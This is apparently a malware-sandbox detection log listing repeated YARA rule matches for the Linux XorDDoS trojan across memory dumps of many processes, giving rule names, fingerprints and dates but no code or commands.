Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
